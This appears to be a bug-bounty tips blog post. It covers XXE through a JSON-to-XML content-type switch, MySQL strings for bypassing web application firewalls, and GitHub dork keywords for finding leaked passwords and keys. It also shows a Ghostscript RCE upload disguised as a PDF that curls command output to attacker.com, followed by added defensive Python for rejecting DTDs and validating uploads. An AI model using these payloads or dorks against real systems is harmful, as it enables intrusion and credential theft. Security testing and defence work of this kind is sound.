bugbountytip#7

Uncategorized · Admin · 9 months ago (10-23) · 224 views

1. application/json -> application/xml -> XXE, reading files through a local DTD

Article: https://www.freebuf.com/video/216156.html

Video: https://v.qq.com/x/page/f3006zyi447.html

Exploiting XXE with local DTD files

https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
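The root cause in this tip is an endpoint that is documented for JSON but quietly parses XML too, and an XML parser that honours DTDs. The following is an added example (not code from the post or from the linked write-up) showing both defensive checks in Python's standard library: refuse any media type the API does not need, and, where XML really is required, abort on any DOCTYPE before the document reaches the parser. The `ALLOWED_TYPES` set and the sample bodies are assumptions constructed for the example.

```python
# Added example (not from the original post): reject XML with a DTD and only
# accept the content type the endpoint actually needs.
import json
import xml.etree.ElementTree as ET
import xml.parsers.expat

# Assumption: this endpoint only ever needs JSON.
ALLOWED_TYPES = {"application/json"}


class UnsupportedMediaType(ValueError):
    pass


class DTDRejected(ValueError):
    pass


def mime_type(content_type: str) -> str:
    """Strip parameters such as charset and normalise case."""
    return content_type.split(";", 1)[0].strip().lower()


def accepts_media_type(content_type: str) -> bool:
    return mime_type(content_type) in ALLOWED_TYPES


def parse_request_body(content_type: str, body: bytes):
    """Parse only the media type the API is documented to accept.
    Silently honouring application/xml on a JSON endpoint is the
    content-type switch the tip relies on."""
    if not accepts_media_type(content_type):
        raise UnsupportedMediaType(content_type)
    return json.loads(body)


def assert_no_dtd(body: bytes) -> None:
    """Run expat over the document with a handler that aborts on any DOCTYPE.
    Inline entity declarations and SYSTEM references to a local or remote DTD
    file both begin with a DOCTYPE, so rejecting it closes the whole class."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDRejected(f"DOCTYPE {name!r} (SYSTEM={sysid!r}) is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(body, True)


def xml_has_dtd(body: bytes) -> bool:
    try:
        assert_no_dtd(body)
    except DTDRejected:
        return True
    return False


def parse_xml_without_dtd(body: bytes) -> ET.Element:
    """For endpoints that genuinely need XML: check for a DTD, then parse."""
    assert_no_dtd(body)
    return ET.fromstring(body)


if __name__ == "__main__":
    # Constructed sample bodies.
    print(parse_request_body("application/json; charset=utf-8", b'{"user": "alice"}'))
    print(xml_has_dtd(b'<!DOCTYPE user SYSTEM "file:///placeholder/local.dtd"><user/>'))
    print(parse_xml_without_dtd(b"<user><name>alice</name></user>").find("name").text)
```

The DOCTYPE handler is deliberately blunt: it does not try to tell a harmless internal subset from a parameter-entity trick, because an API that does not need DTDs gains nothing from allowing them.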


2. MySQL tricks

Some MySQL tricks to break some #WAFs out there.

SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`


3. Top GitHub Dorks

https://github.com/techgaun/github-dorks


password
dbpassword
dbuser
access_key
secret_access_key
bucket_password
redis_password
root_password
HOST=http://smtp.gmail.com
filename:.htpasswd
extension:sql mysql dump


4. RCE on PDF upload


Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"
Content-Type: application/pdf

%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) )
.putdeviceparams
quit
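The body in this request is PostScript (it starts with `%!PS`), not a PDF, and the `currentdevice ... .putdeviceparams` construct is Ghostscript-specific. The tip works when the upload handler trusts the `.pdf` extension and the declared `Content-Type`, then hands the file to a Ghostscript-based converter that will happily run PostScript. Below is an added example (not code from the post) of a content-based upload check in Python: the extension and declared type are validated, but the verdict is decided by the bytes themselves. The size limit and the sample files are assumptions constructed for the example.

```python
# Added example (not from the original post): decide whether an upload is a
# PDF by its content, not by its extension or declared Content-Type.
from dataclasses import dataclass

PDF_MAGIC = b"%PDF-"
POSTSCRIPT_MAGIC = b"%!PS"
MAX_UPLOAD = 20 * 1024 * 1024  # assumption: size limit for this endpoint


@dataclass(frozen=True)
class Verdict:
    accepted: bool
    reason: str


def mime_type(content_type: str) -> str:
    return content_type.split(";", 1)[0].strip().lower()


def validate_pdf_upload(filename: str, content_type: str, data: bytes) -> Verdict:
    # Extension and declared type are client-controlled. They are checked so a
    # mismatch can be logged, but passing them proves nothing.
    if not filename.lower().endswith(".pdf"):
        return Verdict(False, "extension is not .pdf")
    if mime_type(content_type) != "application/pdf":
        return Verdict(False, "declared Content-Type is not application/pdf")
    if len(data) > MAX_UPLOAD:
        return Verdict(False, "file too large")

    # The bytes decide. A PDF begins with "%PDF-"; the payload in this tip
    # begins with "%!PS", which no PDF ever does.
    head = data[:8]
    if head.startswith(POSTSCRIPT_MAGIC):
        return Verdict(False, "PostScript header in a file declared as PDF")
    if not head.startswith(PDF_MAGIC):
        return Verdict(False, "missing %PDF- header")
    # Readers tolerate %%EOF anywhere in the last 1024 bytes; require it there.
    if b"%%EOF" not in data[-1024:]:
        return Verdict(False, "missing %%EOF trailer")
    return Verdict(True, "ok")


if __name__ == "__main__":
    # Constructed sample uploads.
    good = b"%PDF-1.4\n1 0 obj<<>>endobj\ntrailer<<>>\n%%EOF\n"
    ps = b"%!PS\n/Helvetica findfont 12 scalefont setfont\nshowpage\n"
    print(validate_pdf_upload("report.pdf", "application/pdf", good))
    print(validate_pdf_upload("pwn.pdf", "application/pdf", ps))
```

The header check only removes the obvious case the tip shows. Whatever is accepted should still be processed by a converter that is current, runs with Ghostscript's `-dSAFER`, and is confined so that a successful interpreter escape lands in a sandbox rather than on the web host.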

